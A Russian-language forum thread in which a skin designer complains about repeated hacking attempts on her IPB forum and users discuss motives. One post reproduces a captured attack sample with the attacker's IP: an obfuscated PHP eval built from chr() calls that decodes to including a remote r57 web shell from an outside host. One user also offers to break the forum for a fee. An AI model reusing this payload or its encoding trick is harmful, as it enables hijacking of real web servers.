Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
Fisana

Этот форум пытаются взломать


Рекомендованные сообщения

Уже несколько раз в день кто-то пытается тестить на моем форуме эксплойты. Они не работают, но приходится регулярно чистить форум.

Мне интересна психология людей, пытающихся навредить форуму дизайнера, который к тому же, как никто другой, раздает много своих работ бесплатно.

Собственно за что и почему?

 

Мне хочется верить, что это происходит исключительно из-за глупости и неразвитости взломщиков.

Поделиться сообщением


Ссылка на сообщение

Уважаемая Fisana!

Просто восхищаюсь вашим творчеством! Рекспект вам!

Но боюсь что проблема взлома форумов была, будет и остается актуальной всегда...

Мне кажется, что вам просто завидуют... ;)

Скины у вас просто ЗАМЕЧАТЕЛЬНЫЕ... Лучшие, что я видел...

Цена за них минимальна!

Спасибо вам за ваше творчество!

 

С уважением, Zorick

Поделиться сообщением


Ссылка на сообщение

Fisana, удивляет ваша уверенность. человек с прямыми руками уложит любой IPB что бы не писали официальные лица про закрытые дыры. если не верите готов за вознаграждение положить полностью ваш форум.

Поделиться сообщением


Ссылка на сообщение

Zorick,

Спасибо ;)

 

Dimas,

Меня удивляет Ваша готовность его взломать. Объяснять про дыры не нужно, они есть везде. Взломать можно что угодно при желании.

Но зачем? Каковы мотивы?

Лично я не верю, что разумный человек станет заниматься вредительством. А конкурентов хотелось бы иметь достойных, чтобы учиться у них и не расслабляться.

Поделиться сообщением


Ссылка на сообщение

конечно я не собираюсь заниматься вредительством да и не нужно это мне.

Поделиться сообщением


Ссылка на сообщение

Спасибо ;)

Поделиться сообщением


Ссылка на сообщение

Естественно, не нужно это глупым детям ;) вообще-то, не много я видел детей, знающих, скажем, что такое sql-инъекция :D

Наверное, кто-то все же возжелал платных скинов... Во всяком случае, не думаю я, что кто-то решил потестить на банальные дыры в защите сайт дизайнера :D здесь не тот случай, когда "обидеть художника может каждый" :D

Поделиться сообщением


Ссылка на сообщение

Сейчас вроде не нападают. С тех пор, как меня нет в администрации ИБР нападения стихли.

Вероятно, просто кто-то по ссылкам в профилях на ибресурсе ходил хулиганить...

Поделиться сообщением


Ссылка на сообщение
05/23/06 11:41 (изменено)

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

 

 

IP кулхацкера: 193.108.129.122

Изменено пользователем Fisana

Поделиться сообщением


Ссылка на сообщение
05/23/06 11:44 (изменено)

Ребят, однако достали уже.

Даже банить надоело..

 

Пост перенесла сюда...

Буду коллекцию собирать.

Изменено пользователем Fisana

Поделиться сообщением


Ссылка на сообщение

Безнадёжные надежды, такая истинная черта людей. Они некогда не думают, что им можно ответить тем же.

Поделиться сообщением


Ссылка на сообщение

Elminster,

 

теперь увидел)

Поделиться сообщением


Ссылка на сообщение

Fisana

Если люди хотят добыть твои плтные скины, мой совет - держи форум и портфолио на одном сервере, а сами платные файлы на другом B)

 

А то, что после твоего ухода из IBR, атаки поутихли означает, что раньше они хотели захватить твой аккаунт в надежде, что на Ай-Би-Ресурсе будет тот же пароль. Вывод - наивные. B)

Поделиться сообщением


Ссылка на сообщение

Видимо так..

Поделиться сообщением


Ссылка на сообщение

пардон за отфтоп, но здесь существуют ряд несколько причин, и точно , не кто не ответить на этот вопрос, почему пытаються ломать форумы? Есть кто из баловства, есть просто кто не равнодушен к индивудиму как fisana, есть просто ради ,.спортивного интреса.

Суть втом что , если так патыються выразить свое превосходство , то это ,,реябчество ,, ломать нужно другое , например базу данных , или фсб.Слабо?

Пардон за лирику. Но выражаюсвою точку зрения на сей счет, просто в сети всегда есть и вменяемые люди, так-же и много больных, с диагнозом ,, маврика,, B)

(я проголосовал за конкуренцию, танеденция рынка рунета))

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...